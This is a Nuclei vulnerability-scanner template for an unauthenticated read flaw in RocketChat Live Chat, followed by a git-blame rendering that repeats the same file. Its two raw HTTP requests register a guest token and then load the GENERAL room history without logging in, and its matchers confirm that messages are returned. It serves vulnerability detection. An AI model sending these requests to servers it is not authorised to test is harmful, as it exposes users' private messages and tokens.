nuclei-templates/vulnerabilities/rocketchat/unauth-message-read.yaml

id: rockethchat-unauth-access

info:
  name: RocketChat Unauthenticated Read Access
  author: rojanrijal
  severity: critical
  description: An issue with the Live Chat accepting invalid parameters could potentially allow unauthenticated access to messages and user tokens.
  reference: https://docs.rocket.chat/guides/security/security-updates
  tags: rockethchat,unauth

requests:
  - raw:
      - |
        POST /api/v1/method.callAnon/cve_exploit HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/json
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

        {"message":"{\"msg\":\"method\",\"method\":\"livechat:registerGuest\",\"params\":[{\"token\":\"cvenucleirocketchat\",\"name\":\"cve-2020-nuclei\",\"email\":\"cve@nuclei.local\"}],\"id\":\"123\"}"}

      - |
        POST /api/v1/method.callAnon/cve_exploit HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/json

        {"message":"{\"msg\":\"method\",\"method\":\"livechat:loadHistory\",\"params\":[{\"token\":\"cvenucleirocketchat\",\"rid\":\"GENERAL\"}],\"msg\":\"123\"}"}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - '"{\"msg\":\"result\",\"result\":{\"messages\"'
          - '"success":true'
        part: body
        condition: and
Create unauth-message-read.yaml 2021-03-29 06:42:11 +00:00			`id: rockethchat-unauth-access`
Added more info and strict matcher 2021-03-29 11:35:11 +00:00
Create unauth-message-read.yaml 2021-03-29 06:42:11 +00:00			`info:`
			`name: RocketChat Unauthenticated Read Access`
			`author: rojanrijal`
			`severity: critical`
Added more info and strict matcher 2021-03-29 11:35:11 +00:00			`description: An issue with the Live Chat accepting invalid parameters could potentially allow unauthenticated access to messages and user tokens.`
			`reference: https://docs.rocket.chat/guides/security/security-updates`
			`tags: rockethchat,unauth`
Create unauth-message-read.yaml 2021-03-29 06:42:11 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`POST /api/v1/method.callAnon/cve_exploit HTTP/1.1`
			`Host: {{Hostname}}`
			`Origin: {{BaseURL}}`
			`Content-Type: application/json`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8`

			`{"message":"{\"msg\":\"method\",\"method\":\"livechat:registerGuest\",\"params\":[{\"token\":\"cvenucleirocketchat\",\"name\":\"cve-2020-nuclei\",\"email\":\"cve@nuclei.local\"}],\"id\":\"123\"}"}`

			`- \|`
			`POST /api/v1/method.callAnon/cve_exploit HTTP/1.1`
			`Host: {{Hostname}}`
			`Origin: {{BaseURL}}`
			`Content-Type: application/json`

			`{"message":"{\"msg\":\"method\",\"method\":\"livechat:loadHistory\",\"params\":[{\"token\":\"cvenucleirocketchat\",\"rid\":\"GENERAL\"}],\"msg\":\"123\"}"}`

			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
			`- type: word`
			`words:`
Added more info and strict matcher 2021-03-29 11:35:11 +00:00			`- '"{\"msg\":\"result\",\"result\":{\"messages\"'`
			`- '"success":true'`
Create unauth-message-read.yaml 2021-03-29 06:42:11 +00:00			`part: body`
Rename vulnerabilities/rockethcat/unauth-message-read.yaml to vulnerabilities/rocketchat/unauth-message-read.yaml 2021-04-11 01:27:51 +00:00			`condition: and`